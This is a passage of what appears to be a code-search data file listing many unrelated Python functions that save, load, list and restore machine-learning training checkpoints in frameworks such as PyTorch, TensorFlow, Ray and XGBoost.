self.checkpointer.get_save_address())\n Pickle.dump(step + 1, open(step_file, 'wb'))\n print 'Checkpointing Complete. Deleting historical checkpoints....'\n self.checkpointer.delete_previous_checkpoints(num_previous=2)\n print 'Deleted.. Moving forward...'\n\n offset = (step * self.train_batch_size) % self.train_size\n batch_data_fwd = self.X_trn_fwd[offset:(offset + self.train_batch_size), :].T\n batch_data_bwd = self.X_trn_bwd[offset:(offset + self.train_batch_size), :].T\n batch_labels = self.Y_trn[offset:(offset + self.train_batch_size), :].T\n\n loss_t_forward, loss_t_backward = self._train_batch(batch_data_fwd, batch_data_bwd, batch_labels)\n print \"Present Loss Forward:\", loss_t_forward\n print \"Present Loss Backward:\", loss_t_backward\n\n # check results on 2 tasks - Visual Validation\n print 'Train Data Validation\\n'\n self._visual_validate(self.X_trn_fwd[301, :], self.X_trn_bwd[301, :], self.Y_trn[301, :])\n print\n print\n print 'Test Data Validation\\n'\n self._visual_validate(self.X_tst_fwd[56, :], self.X_tst_bwd[56, :], self.Y_tst[56, :])\n print\n print\n\n # Store prediction after certain number of steps #############\n # This will be useful for the graph construction\n '''\n if(step % self.checkpointer.get_prediction_checkpoint_steps() == 0):\n self.predict()\n self.store_test_predictions('_' + str(step))\n '''", "def previous_saves(self):\n if os.path.exists(self.results_dir):\n return sorted([x for x in Path(self.results_dir).glob(f'{self.model_name}checkpoint_*.pk')], key=lambda s: int(s.name.replace(f'{self.model_name}checkpoint_', '').replace('.pk', '')))\n else:\n return []", "def load_training_checkpoint(args, model, PATH, ckpt_id):\r\n logger = args.logger\r\n _, checkpoint_state_dict = model.network.load_checkpoint(PATH, ckpt_id)\r\n epoch = checkpoint_state_dict['epoch']\r\n last_global_step = checkpoint_state_dict['last_global_step']\r\n last_global_data_samples = checkpoint_state_dict[\r\n 'last_global_data_samples']\r\n del checkpoint_state_dict\r\n return (epoch, last_global_step, last_global_data_samples)", "def load_checkpoints(args, model): \n print('Loading the model checkpoints 
from iter {}...'.format(args.resume_iter))\n checkpoint_path = os.path.join(config.checkpoint_path, args.model_type)\n\n gen_g_path = os.path.join(checkpoint_path, '{}-Gen_g.ckpt'.format(args.resume_iter))\n gen_f_path = os.path.join(checkpoint_path, '{}-Gen_f.ckpt'.format(args.resume_iter))\n model.gen_g.load_state_dict(torch.load(gen_g_path, map_location=lambda storage, loc: storage))\n model.gen_f.load_state_dict(torch.load(gen_f_path, map_location=lambda storage, loc: storage))\n\n if args.train:\n dis_c_path = os.path.join(checkpoint_path, '{}-Dis_c.ckpt'.format(args.resume_iter))\n dis_t_path = os.path.join(checkpoint_path, '{}-Dis_t.ckpt'.format(args.resume_iter))\n model.dis_c.load_state_dict(torch.load(dis_c_path, map_location=lambda storage, loc: storage))\n model.dis_t.load_state_dict(torch.load(dis_t_path, map_location=lambda storage, loc: storage))", "def test_checkpoints(self):\r\n\r\n self.tmpdir = mkdtemp(dir=\"./\",\r\n suffix=\"_test_checkpoints/\")\r\n\r\n bestscores = dict({1: 0.9,\r\n 2: 1.1,\r\n 3: 2.3,\r\n 4: 99.93232344})\r\n\r\n out_fp = write_checkpoint(\r\n \"Key\", 99, self.mapping, [1, 2, 3, 4], bestscores,\r\n [2, 1, 3, 4],\r\n self.tmpdir)\r\n\r\n observed = read_checkpoint(out_fp)\r\n\r\n self.assertEqual(observed[0], \"Key\")\r\n self.assertEqual(observed[1], 99)\r\n self.assertEqual(observed[2], self.mapping)\r\n self.assertEqual(observed[3], [1, 2, 3, 4])\r\n self.assertEqual(observed[4], bestscores)\r\n self.assertEqual(observed[5], [2, 1, 3, 4])", "def testCheckpointContinuationValidity(self):\n\n # Train once, get checkpoint via callback returns\n res_1 = {}\n bst_1 = train(\n self.params,\n RayDMatrix(self.x, self.y),\n callbacks=[\n _checkpoint_callback(frequency=1, before_iteration_=False)\n ],\n num_boost_round=2,\n ray_params=RayParams(num_actors=2),\n additional_results=res_1)\n last_checkpoint_1 = res_1[\"callback_returns\"][0][-1]\n last_checkpoint_other_rank_1 = res_1[\"callback_returns\"][1][-1]\n\n # Sanity check\n lc1 = xgb.Booster()\n lc1.load_model(last_checkpoint_1)\n self.assertEqual(last_checkpoint_1, last_checkpoint_other_rank_1)\n self.assertEqual(last_checkpoint_1, lc1.save_raw())\n self.assertEqual(bst_1.get_dump(), lc1.get_dump())\n\n # Start new training run, starting from existing model\n res_2 = {}\n bst_2 = train(\n self.params,\n RayDMatrix(self.x, self.y),\n callbacks=[\n _checkpoint_callback(frequency=1, before_iteration_=True),\n _checkpoint_callback(frequency=1, before_iteration_=False)\n ],\n num_boost_round=4,\n ray_params=RayParams(num_actors=2),\n additional_results=res_2,\n xgb_model=lc1)\n first_checkpoint_2 = res_2[\"callback_returns\"][0][0]\n first_checkpoint_other_actor_2 = res_2[\"callback_returns\"][1][0]\n last_checkpoint_2 = res_2[\"callback_returns\"][0][-1]\n last_checkpoint_other_actor_2 = res_2[\"callback_returns\"][1][-1]\n\n fcp_bst = xgb.Booster()\n fcp_bst.load_model(first_checkpoint_2)\n\n lcp_bst = xgb.Booster()\n lcp_bst.load_model(last_checkpoint_2)\n\n # Sanity check\n self.assertEqual(first_checkpoint_2, first_checkpoint_other_actor_2)\n self.assertEqual(last_checkpoint_2, last_checkpoint_other_actor_2)\n self.assertEqual(bst_2.get_dump(), lcp_bst.get_dump())\n\n # Training should not have proceeded for the first checkpoint,\n # so trees should be equal\n self.assertEqual(lc1.get_dump(), fcp_bst.get_dump())\n\n # Training should have proceeded for the last checkpoint,\n # so trees should not be equal\n self.assertNotEqual(fcp_bst.get_dump(), lcp_bst.get_dump())", "async def checkpoint(cls) -> 
None:", "def train(stop_criteria, save_dir):\n analysis = ray.tune.run(ppo.PPOTrainer, config=config, local_dir=save_dir, stop=stop_criteria,\n checkpoint_at_end=True)\n # list of lists: one list per checkpoint; each checkpoint list contains 1st the path, 2nd the metric value\n trial = analysis.get_best_trial('episode_reward_mean', 'max', 'all', True)\n checkpoints = analysis.get_trial_checkpoints_paths(trial=trial, metric='episode_reward_mean')\n # retrieve the checkpoint path; we only have a single checkpoint, so take the first one\n checkpoint_path = checkpoints[0][0]\n return checkpoint_path, analysis", "def _restore_training_state(self, restore_state):\n self.load_state_dict(restore_state[\"model\"])\n self.optimizer.load_state_dict(restore_state[\"optimizer\"])\n self.lr_scheduler.load_state_dict(restore_state[\"lr_scheduler\"])\n start_iteration = restore_state[\"iteration\"] + 1\n if self.config[\"verbose\"]:\n print(f\"Restored checkpoint to iteration {start_iteration}.\")\n\n if restore_state[\"best_model_found\"]:\n # Update checkpointer with appropriate information about best model\n # Note that the best model found so far may not be the model in the\n # checkpoint that is currently being loaded.\n self.checkpointer.best_model_found = True\n self.checkpointer.best_iteration = restore_state[\"best_iteration\"]\n self.checkpointer.best_score = restore_state[\"best_score\"]\n if self.config[\"verbose\"]:\n print(\n f\"Updated checkpointer: \"\n f\"best_score={self.checkpointer.best_score:.3f}, \"\n f\"best_iteration={self.checkpointer.best_iteration}\"\n )\n return start_iteration", "def _get_checkpoint(self):\n ckpt = tf.train.get_checkpoint_state(self.model)\n if ckpt and ckpt.model_checkpoint_path:\n ckpt_path = ckpt.model_checkpoint_path\n else:\n raise RuntimeError('No checkpoint file found')\n return ckpt_path", "def __call__(self, save_fct):\n eval_scores = [\"Not evaluated\"]\n if self.train:\n logger.info(\"> Training\")\n self.train.run_training(save_fct = save_fct)\n logger.info('reverting learned weights to best checkpoint..')\n try:\n ParamManager.param_col.revert_to_best_model()\n except RevertingUnsavedModelException:\n pass\n\n evaluate_args = self.evaluate\n if evaluate_args:\n logger.info(\"> Performing final evaluation\")\n eval_scores = []\n for evaluator in evaluate_args:\n eval_score = evaluator.eval()\n if type(eval_score) == list:\n eval_scores.extend(eval_score)\n else:\n eval_scores.append(eval_score)\n\n return eval_scores", "def next_checkpoint_index(self):\n return self._next_checkpoint", "def checkpoint(self):\n save()", "def checkpoint(self):\n checkpoint_status = self.load.checkpoint()\n if checkpoint_status >= TD_ERROR:\n status_message = MESSAGES.get(int(checkpoint_status), None)\n error_table = [(\"Error Code\", \"Error Description\")]\n error_table.append((checkpoint_status, status_message))\n log.info(\"\\r{}\".format(format_table(error_table)))\n return checkpoint_status", "def save_checkpoint(self):\n if not self.save_ckpt:\n return\n\n lookup = None\n is_best = False\n checkpoint = self.create_checkpoint()\n\n # save best only or not?\n if self.save_best_only:\n if self.valid_dataloader:\n for item in [self.valid_metric_meters, self.valid_loss_meters]:\n if self.primary_indicator in item:\n lookup = item\n else:\n for item in [self.train_metric_meters, self.train_loss_meters]:\n if self.primary_indicator in item:\n lookup = item\n if lookup:\n value = lookup[self.primary_indicator].avg\n if self.best_mode == 'min':\n if value < 
self.best_indicator:\n self.best_indicator = value\n is_best = True\n else:\n if value > self.best_indicator:\n self.best_indicator = value\n is_best = True\n\n # TODO: better naming convention\n if self.valid_dataloader:\n metric_string = '-'.join([\n f'{metric}-[{self.valid_metric_meters[metric].avg:.5f}]'\n for metric in self.valid_metric_meters\n ])\n loss_string = '-'.join([\n f'{loss}-[{self.valid_loss_meters[loss].avg:.5f}]'\n for loss in self.valid_loss_meters\n ])\n else:\n metric_string = '-'.join([\n f'{metric}-[{self.train_metric_meters[metric].avg:.5f}]'\n for metric in self.train_metric_meters\n ])\n loss_string = '-'.join([\n f'{loss}-[{self.train_loss_meters[loss].avg:.5f}]'\n for loss in self.train_loss_meters\n ])\n # TODO: use config for paths\n # make subdir\n folder = Path(self.save_path, str(self.fold_idx))\n folder.mkdir(parents=True, exist_ok=True)\n if not self.save_best_only or (self.save_best_only and is_best):\n torch.save(checkpoint,\n f'{folder}/ep-[{self.epoch}]-iter-[{self.iter}]-{loss_string}-{metric_string}.pth')", "def get_ckpt_list(self,\n ckpt_type):\n if ckpt_type == \"debug\":\n ckpt_state = tf.train.get_checkpoint_state(self.ckpt_debug_dir)\n if ckpt_state is None:\n raise FileNotFoundError(\"checkpoint files doesn't exist\")\n \n return ckpt_state.all_model_checkpoint_paths\n elif ckpt_type == \"epoch\":\n ckpt_state = tf.train.get_checkpoint_state(self.ckpt_epoch_dir)\n if ckpt_state is None:\n raise FileNotFoundError(\"checkpoint files doesn't exist\")\n \n return ckpt_state.all_model_checkpoint_paths\n else:\n raise ValueError(\"unsupported checkpoint type {0}\".format(ckpt_type))", "def load_checkpoint(self):\n if self.params.resume_from is not None and os.path.exists(self.params.resume_from):\n try:\n LOG('Loading Checkpoint at %s' % self.params.resume_from)\n ckpt = torch.load(self.params.resume_from)\n self.epoch = ckpt['epoch']\n try:\n self.train_loss = ckpt['train_loss']\n self.val_loss = ckpt['val_loss']\n except:\n self.train_loss = []\n self.val_loss = []\n self.network.load_state_dict(ckpt['state_dict'])\n self.opt.load_state_dict(ckpt['optimizer'])\n LOG('Checkpoint Loaded!')\n LOG('Current Epoch: %d' % self.epoch)\n self.ckpt_flag = True\n except:\n WARNING('Cannot load checkpoint from %s. Start loading pre-trained model......' % self.params.resume_from)\n else:\n WARNING('Checkpoint do not exists. 
Start loading pre-trained model......')", "def _find_last_checkpoint(self):\n highest_num, last_checkpoint = -np.inf, None\n for filename in os.listdir(self.logdir):\n # checkpoints look like logdir/model.ckpt-N\n # self._save_path is \"logdir/model.ckpt\"\n if os.path.basename(self._save_path) in filename:\n try:\n N = int(filename.split(\"-\")[1].split(\".\")[0])\n if N > highest_num:\n highest_num = N\n last_checkpoint = \"model.ckpt-\" + str(N)\n except ValueError:\n pass\n return os.path.join(self.logdir, last_checkpoint)", "async def checkpoint() -> None:\n await get_async_backend().checkpoint()", "def get_checkpoint_list_by_date(cls, date):\n return cls.create_checkpoint_list_by_date(date)", "def _restore_models_and_step(self):\n global_step_D = global_step_G = 0\n\n if self.netD_ckpt_file:\n assert os.path.exists(self.netD_ckpt_file)\n print(\"INFO: Restoring checkpoint for D...\")\n global_step_D = self.netD.restore_checkpoint(\n ckpt_file=self.netD_ckpt_file, optimizer=self.optD)\n\n if self.netG_ckpt_file:\n assert os.path.exists(self.netG_ckpt_file)\n print(\"INFO: Restoring checkpoint for G...\")\n global_step_G = self.netG.restore_checkpoint(\n ckpt_file=self.netG_ckpt_file, optimizer=self.optG)\n\n if self.train_drs and self.netD_drs_ckpt_file:\n assert os.path.exists(self.netD_drs_ckpt_file)\n print(\"INFO: Restoring checkpoint for D_drs...\")\n global_step_D = self.netD_drs.restore_checkpoint(\n ckpt_file=self.netD_drs_ckpt_file, optimizer=self.optD_drs)\n\n if global_step_D != global_step_G:\n print(f'WARN: global_step_D {global_step_D} != global_step_G {global_step_G}, use global_step_G')\n global_step = global_step_G # Restores global step\n\n return global_step", "def checkpoint(self, epoch: int):\n if self.exp.scheduler_stepper is not None:\n torch.save(\n {\n \"model_state_dict\": self.exp.model.state_dict(),\n \"optimizer_state_dict\": self.exp.optimizer.state_dict(),\n \"scheduler_state_dict\": self.exp.scheduler_stepper.scheduler.state_dict(),\n \"Epoch\": epoch,\n },\n self.exp.path,\n )\n else:\n torch.save(\n {\n \"model_state_dict\": self.exp.model.state_dict(),\n \"optimizer_state_dict\": self.exp.optimizer.state_dict(),\n \"Epoch\": epoch,\n },\n self.exp.path,\n )", "def load_checkpoint_train(cpdir, model, optimizer):\n start_epoch = 0\n start_global_step = 0\n if cpdir is not None:\n start_global_step, start_epoch = load_checkpoint(\n cpdir, model, optimizer)\n start_global_step += 1\n start_epoch += 1\n return start_global_step, start_epoch", "def finetuning_callbacks(checkpoint_path, patience, verbose):\n cb_verbose = (verbose >= 2)\n checkpointer = ModelCheckpoint(monitor='val_loss', filepath=checkpoint_path,\n save_best_only=True, verbose=cb_verbose)\n earlystop = EarlyStopping(monitor='val_loss', patience=patience,\n verbose=cb_verbose)\n return [checkpointer, earlystop]", "def reload_checkpoint_if_exists(sess, saver, train_writer, validation_writer, test_writer):\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n # Restores from checkpoint\n saver.restore(sess, ckpt.model_checkpoint_path)\n # extract global_step from it.\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1])\n print(\"checkpoint found at step %d\", global_step)\n # ensure that the writers ignore saved summaries that occurred after the last checkpoint but before a crash\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n 
validation_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n else:\n print('No checkpoint file found')\n return global_step", "def get_overall_checkpoint_by_date(cls, date):\n return cls.create_overall_checkpoint_by_date(date)", "def load_checkpoint(checkpoint_dir, epoch, iteration):\n path = opj(checkpoint_dir, str(epoch) + '.' + str(iteration) + '.ckpt')\n if not os.path.isfile(path):\n raise Exception(\"Checkpoint in epoch %d doesn't exist :sob:\" % epoch)\n\n checkpoint = torch.load(path)\n start_epoch = checkpoint['epoch']\n state_dict = checkpoint['state_dict']\n start_iteration = checkpoint['iteration']\n\n assert iteration == start_iteration\n return start_epoch, start_iteration, state_dict", "def _get_callbacks(self):\n csv_logger = CSVLogger(self.model.FIT_HISTORY_PATH, append=False, separator=';')\n checkpoint = ModelCheckpoint(self.model.WEIGHT_PATH,\n monitor='val_loss',\n verbose=1,\n save_best_only=True,\n mode='min',\n save_weights_only=True)\n\n reduceLROnPlat = ReduceLROnPlateau(monitor='val_loss',\n factor=0.2,\n patience=1,\n verbose=1,\n mode='min',\n min_delta=0.0001,\n cooldown=0,\n min_lr=1e-10)\n\n early = EarlyStopping(monitor=\"val_loss\", mode=\"min\", verbose=2, patience=5, min_delta=0.0001)\n tb = TensorBoard(log_dir=\"./Graph\", write_grads=True,\n histogram_freq=1, write_images=True)\n return [checkpoint, early, reduceLROnPlat, csv_logger]", "def load_checkpoint(args, trainer, epoch_itr):\n os.makedirs(os.path.join(args.save_dir, 'checkpoints'), exist_ok=True)\n checkpoint_path = os.path.join(args.save_dir, 'checkpoints', args.restore_file)\n if os.path.isfile(checkpoint_path):\n extra_state = trainer.load_checkpoint(checkpoint_path)\n if extra_state is not None:\n # replay train iterator to match checkpoint\n epoch_itr.load_state_dict(extra_state['train_iterator'])\n\n print('| loaded checkpoint {} (epoch {} @ {} updates)'.format(\n checkpoint_path, epoch_itr.epoch, trainer.get_num_updates()))\n\n trainer.lr_step(epoch_itr.epoch)\n trainer.lr_step_update(trainer.get_num_updates())\n if 'best' in extra_state:\n save_checkpoint.best = extra_state['best']", "def load_latest(self):\n all_checkpoints = self.sorted_checkpoints()\n\n extras = None\n meta = None\n for f in all_checkpoints:\n try:\n extras, meta = self.load(f)\n return extras, meta\n except Exception as e:\n log.debug(\n \"Could not load checkpoint \\\"{}\\\", moving on ({}).\".format(f, e))\n log.debug(\"No checkpoint found to load.\")\n return extras, meta", "def list_checkpoints(self, name, path=''):\n\t\tself.log.debug(\"listing checkpoint %s %s\", path, name)\n\t\tcheckpoint_id = \"checkpoint\"\n\t\tos_path = self.get_checkpoint_path(checkpoint_id, name, path)\n\t\tif not key_exists(self.bucket, os_path):\n\t\t\treturn []\n\t\telse:\n\t\t\treturn [self.get_checkpoint_model(checkpoint_id, name, path)]", "def checkpoint(func, inputs, params, flag):\n return func(*inputs)", "def load_all(self):\r\n iteration_number = 0\r\n iteration_numbers = []\r\n for prefix, saver in self._savers.items():\r\n output_path = '%s/checkpoints/%s' % (self._model.output_path, prefix)\r\n checkpoint = tf.train.get_checkpoint_state(output_path)\r\n if checkpoint and checkpoint.model_checkpoint_path:\r\n checkpoint_name = os.path.basename(checkpoint.model_checkpoint_path)\r\n try: # Attempt to restore saveable variables\r\n self._savers[prefix].restore(self._tensorflow_session,\r\n '%s/%s' % (output_path, 
checkpoint_name))\r\n iteration_numbers.append(\r\n int(next(re.finditer(\"(\\d+)(?!.*\\d)\", checkpoint_name)).group(0))\r\n )\r\n except Exception as e:\r\n import traceback\r\n traceback.print_exc()\r\n if len(iteration_numbers) > 0:\r\n iteration_number = np.amax(iteration_numbers)\r\n return iteration_number", "def _init_checkpoint_and_variables(pretrain_checkpoint_path,\n pretrain_checkpoint_exclude_scopes):\n checkpoint_reader = tf.contrib.framework.load_checkpoint(\n pretrain_checkpoint_path)\n return get_variables_to_restore_from_pretrain_checkpoint(\n pretrain_checkpoint_exclude_scopes,\n checkpoint_reader.get_variable_to_shape_map())", "def warm_start_training(self, sess): \n ckpt = tf.train.latest_checkpoint(self.train_dir)\n if ckpt:\n # the global_step will restore sa well\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=100)\n saver.restore(sess, ckpt)\n print('restore from the checkpoint{0}'.format(ckpt))\n return\n \n if self.checkpoint_path is None:\n return None\n \n exclusions = []\n if self.checkpoint_exclude_scopes:\n exclusions = [scope.strip()\n for scope in self.checkpoint_exclude_scopes.split(',')]\n # TODO(sguada) variables.filter_variables()\n variables_to_restore = []\n all_variables = slim.get_model_variables()\n if tf.gfile.IsDirectory(self.checkpoint_path):\n global_step = slim.get_or_create_global_step()\n all_variables.append(global_step)\n checkpoint_path = tf.train.latest_checkpoint(self.checkpoint_path)\n else:\n checkpoint_path = self.checkpoint_path\n \n for var in all_variables:\n excluded = False\n \n for exclusion in exclusions:\n if var.op.name.startswith(exclusion):\n excluded = True\n break\n if not excluded:\n variables_to_restore.append(var)\n \n# tf.logging.info('Fine-tuning from %s' % checkpoint_path)\n \n slim.assign_from_checkpoint_fn(\n checkpoint_path,\n variables_to_restore)(sess)\n return", "def save_checkpoint(self, checkpoint: str) -> str:\n\n # Some model might need to aggregate variables during checkpointing\n # which requires both the chief and workers to participate in the\n # allreduce communication protocol.\n # So we need to call get_state on every remote workers, otherwise\n # it might get stuck\n state_refs = [w.get_state.remote() for w in self.remote_workers]\n\n state = ray.get(state_refs[0])\n\n with open(checkpoint, \"wb\") as f:\n SafePickle.dump(state, f)\n\n return checkpoint", "def load_ckpt(saver, sess, ckpt_dir=\"train\"):\n while True:\n try:\n latest_filename = \"checkpoint_best\" if ckpt_dir==\"eval\" else None\n ckpt_dir = os.path.join(FLAGS.log_root, ckpt_dir)\n ckpt_state = tf.train.get_checkpoint_state(ckpt_dir, latest_filename=latest_filename)\n tf.logging.info('Loading checkpoint %s', ckpt_state.model_checkpoint_path)\n saver.restore(sess, ckpt_state.model_checkpoint_path)\n return ckpt_state.model_checkpoint_path\n except:\n tf.logging.info(\"Failed to load checkpoint from %s. 
Sleeping for %i secs...\", ckpt_dir, 10)\n time.sleep(10)", "def create_checkpoint_machinery(self):\n # Create checkpoint instance.\n checkpoint_dir = os.path.join(\n self.params[\"output_dir\"], \"checkpoints\"\n )\n checkpoint_prefix = os.path.join(checkpoint_dir, \"ckpt\")\n\n checkpoint = tf.train.Checkpoint(\n generator_model=(\n self.network_objects[\"generator\"].models[self.num_growths - 1]\n ),\n discriminator_model=(\n self.network_objects[\"discriminator\"].models[self.num_growths - 1]\n ),\n generator_optimizer=self.optimizers[\"generator\"],\n discriminator_optimizer=self.optimizers[\"discriminator\"]\n )\n\n # Create checkpoint manager.\n self.checkpoint_manager = tf.train.CheckpointManager(\n checkpoint=checkpoint,\n directory=checkpoint_dir,\n max_to_keep=self.params[\"keep_checkpoint_max\"],\n step_counter=self.global_step,\n checkpoint_interval=self.params[\"save_checkpoints_steps\"]\n )\n\n # Restore any prior checkpoints.\n status = checkpoint.restore(\n save_path=self.checkpoint_manager.latest_checkpoint\n )", "def evaluate():\n tf.compat.v1.enable_eager_execution()\n\n candidate_checkpoint = None\n uflow = uflow_main.create_uflow()\n evaluate_fn, _ = uflow_data.make_eval_function(\n FLAGS.eval_on,\n FLAGS.height,\n FLAGS.width,\n progress_bar=True,\n plot_dir=FLAGS.plot_dir,\n num_plots=50)\n\n latest_checkpoint = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n while 1:\n # Wait for a new checkpoint\n while candidate_checkpoint == latest_checkpoint:\n logging.log_every_n(logging.INFO,\n 'Waiting for a new checkpoint, at %s, latest is %s',\n 20, FLAGS.checkpoint_dir, latest_checkpoint)\n time.sleep(0.5)\n candidate_checkpoint = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n candidate_checkpoint = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n latest_checkpoint = candidate_checkpoint\n logging.info('New checkpoint found: %s', candidate_checkpoint)\n # This forces the checkpoint manager to reexamine the checkpoint directory\n # and become aware of the new checkpoint.\n uflow.update_checkpoint_dir(FLAGS.checkpoint_dir)\n uflow.restore()\n eval_results = evaluate_fn(uflow)\n uflow_plotting.print_eval(eval_results)\n step = tf.compat.v1.train.get_global_step().numpy()\n if step >= FLAGS.num_train_steps:\n logging.info('Evaluator terminating - completed evaluation of checkpoint '\n 'from step %d', step)\n return", "def get_checkpoint(model, checkpoint='-1'):\n if not os.path.isfile(os.path.join(model, \"checkpoint\")):\n sys.exit(\"[ERROR] Cannot find checkpoint in %s.\" % model)\n ckpt = tf.train.get_checkpoint_state(model)\n\n model_checkpoint_path = ckpt.model_checkpoint_path\n all_model_checkpoint_paths = ckpt.all_model_checkpoint_paths\n\n if not ckpt or not model_checkpoint_path:\n sys.exit(\"[ERROR] Cannot read checkpoint %s.\" % os.path.join(model, \"checkpoint\"))\n\n steps = [int(c.rsplit('-', 1)[1]) for c in all_model_checkpoint_paths]\n steps = sorted(steps)\n if checkpoint == \"last\":\n tf.logging.info(\"Load the last saved model.\")\n checkpoint = steps[-1]\n else:\n checkpoint = int(checkpoint)\n if checkpoint == -1:\n tf.logging.info(\"Load the best model according to valid_loss\")\n min_epoch = -1\n min_loss = 1e10\n with open(os.path.join(model, \"valid_loss\")) as f:\n for line in f.readlines():\n epoch, loss, eer = line.split(\" \")\n epoch = int(epoch)\n loss = float(loss)\n if loss < min_loss:\n min_loss = loss\n min_epoch = epoch\n # Add 1 to min_epoch since epoch is 0-based\n config_json = os.path.join(model, \"config.json\")\n params = 
Params(config_json)\n checkpoint = (min_epoch + 1) * params.num_steps_per_epoch\n tf.logging.info(\"The checkpoint is %d\" % checkpoint)\n assert checkpoint in steps, \"The checkpoint %d not in the model directory\" % checkpoint\n\n model_checkpoint_path = model_checkpoint_path.rsplit(\"-\", 1)[0] + \"-\" + str(checkpoint)\n model_checkpoint_path = os.path.join(model, os.path.basename(model_checkpoint_path))\n\n with open(os.path.join(model, \"checkpoint\"), \"w\") as f:\n f.write(\"model_checkpoint_path: \\\"%s\\\"\\n\" % model_checkpoint_path)\n for checkpoint in all_model_checkpoint_paths:\n checkpoint_new = os.path.join(model, os.path.basename(checkpoint))\n f.write(\"all_model_checkpoint_paths: \\\"%s\\\"\\n\" % checkpoint_new)\n return model_checkpoint_path", "def load_checkpoint(self, filename):\n results = Future.gen_list([\n self.call_async(rank, '_async_load_checkpoint', filename=filename)\n for rank in range(self.num_replicas)\n ])\n extra_state = results[0]\n return extra_state", "def checkpoint(self):\n self.logger.info('Checkpointing Sampler')\n with open(self.resume_file, \"wb\") as f:\n pickle.dump(self, f)", "def save_states(self, checkpoint):\n raise NotImplementedError()", "def find_checkpoint(load_dir, seen_step):\n ckpt = tf.train.get_checkpoint_state(load_dir)\n if ckpt and ckpt.model_checkpoint_path:\n global_step = extract_step(ckpt.model_checkpoint_path)\n if int(global_step) != seen_step:\n return int(global_step), ckpt.model_checkpoint_path\n return -1, None", "def load_ckpt(saver, sess, ckpt_dir=\"train\"):\n while True:\n try:\n latest_filename = \"checkpoint_best\" if ckpt_dir == \"eval\" else None\n ckpt_dir = os.path.join(FLAGS.log_root, ckpt_dir)\n ckpt_state = tf.train.get_checkpoint_state(ckpt_dir, latest_filename=latest_filename)\n tf.logging.info('Loading checkpoint %s', ckpt_state.model_checkpoint_path)\n saver.restore(sess, ckpt_state.model_checkpoint_path)\n return ckpt_state.model_checkpoint_path\n except:\n tf.logging.info(\"Failed to load checkpoint from %s. 
Sleeping for %i secs...\", ckpt_dir, 10)\n time.sleep(10)", "def SelectTrainingCheckpoint(\n log_dir: Path,\n) -> Tuple[epoch_pb2.Epoch, checkpoint_pb2.Checkpoint]:\n epoch_num = -1\n for path in (log_dir / \"epochs\").iterdir():\n if path.name.endswith(\".EpochList.pbtxt\"):\n epoch = pbutil.FromFile(path, epoch_pb2.EpochList())\n if not epoch.epoch[0].train_results.graph_count:\n continue\n epoch_num = max(epoch_num, epoch.epoch[0].epoch_num)\n\n epoch = pbutil.FromFile(\n log_dir / \"epochs\" / f\"{epoch_num:03d}.EpochList.pbtxt\",\n epoch_pb2.EpochList(),\n )\n checkpoint = pbutil.FromFile(\n log_dir / \"checkpoints\" / f\"{epoch_num:03d}.Checkpoint.pb\",\n checkpoint_pb2.Checkpoint(),\n )\n logging.info(\n \"Resuming training from checkpoint %d with val F1 score %.3f\",\n epoch.epoch[0].epoch_num,\n epoch.epoch[0].val_results.mean_f1,\n )\n return epoch.epoch[0], checkpoint", "def getCheckpointList(self, irace):\n\t\tr = []\n\t\tif irace >= len(self.races):\n\t\t\treturn r # new race\n#\t\t\tmsg = \"Toolkit Error: trying to get a checkpoint from race that doesn't exists (bad index %d, actual length %d \" % (irace, len(self.races))\n#\t\t\traise showedError(msg)\n\t\ttherace = self.races[irace]\n\t\tif len(therace.points) > 0:\n\t\t\tfor i in range(len(therace.points)):\n\t\t\t\tline = \" %.3d - %s \" % (i, therace.points[i]['gate'])\n\t\t\t\tr.append(line)\n\t\t\tself.raceIndex = irace\n\t\t\ttherace.showCheckpoints(True)\n\t\treturn r", "def setup_checkpoint(self, base_model, classifier, setops_model, evaluator):\r\n\r\n checkpoint_handler_acc = ModelCheckpoint(\r\n self.results_path,\r\n CKPT_PREFIX,\r\n score_function=lambda eng: round(\r\n (eng.state.metrics[\"fake class acc\"] + eng.state.metrics[\"S class acc\"] +\r\n eng.state.metrics[\"I class acc\"] + eng.state.metrics[\"U class acc\"]) / 4,\r\n 3\r\n ),\r\n score_name=\"val_acc\",\r\n n_saved=2,\r\n require_empty=False\r\n )\r\n checkpoint_handler_last = ModelCheckpoint(\r\n self.results_path,\r\n CKPT_PREFIX,\r\n save_interval=2,\r\n n_saved=2,\r\n require_empty=False\r\n )\r\n evaluator.add_event_handler(\r\n event_name=Events.EPOCH_COMPLETED,\r\n handler=checkpoint_handler_acc,\r\n to_save={\r\n 'base_model': base_model.state_dict(),\r\n 'classifier': classifier.state_dict(),\r\n 'setops_model': setops_model.state_dict(),\r\n }\r\n )\r\n evaluator.add_event_handler(\r\n event_name=Events.EPOCH_COMPLETED,\r\n handler=checkpoint_handler_last,\r\n to_save={\r\n 'base_model': base_model.state_dict(),\r\n 'classifier': classifier.state_dict(),\r\n 'setops_model': setops_model.state_dict(),\r\n }\r\n )", "def load_checkpoint(self, model, optimizers):\n self.epoch = get_last_epoch(self.log_path)\n\n model_state_dict = torch.load(os.path.join(self.log_path, 'checkpoints', str(self.epoch), 'model.ckpt'))\n model.load_state_dict(model_state_dict)\n\n optimizer_state_dict = torch.load(os.path.join(self.log_path, 'checkpoints', str(self.epoch), 'opt.ckpt'))\n for opt_ind in range(len(optimizers)):\n optimizers[opt_ind].opt.load_state_dict(optimizer_state_dict[opt_ind])\n optimizers[opt_ind].opt.state = set_gpu_recursive(optimizers[opt_ind].opt.state, torch.cuda.current_device())\n\n schedulers = load_sched(optimizers, self.epoch)\n\n return model, optimizers, schedulers", "def checkpoint(self, timestamp=0.0, **keywords):\n self.services.debug('checkpoint() method called')\n pass", "def fetch_checkpoints_till_final(checkpoint_dir):\n\n MIN_SLEEP_INTERVAL = 1.0 # in seconds\n MAX_SLEEP_INTERVAL = 60.0 # in seconds\n sleep_interval = 
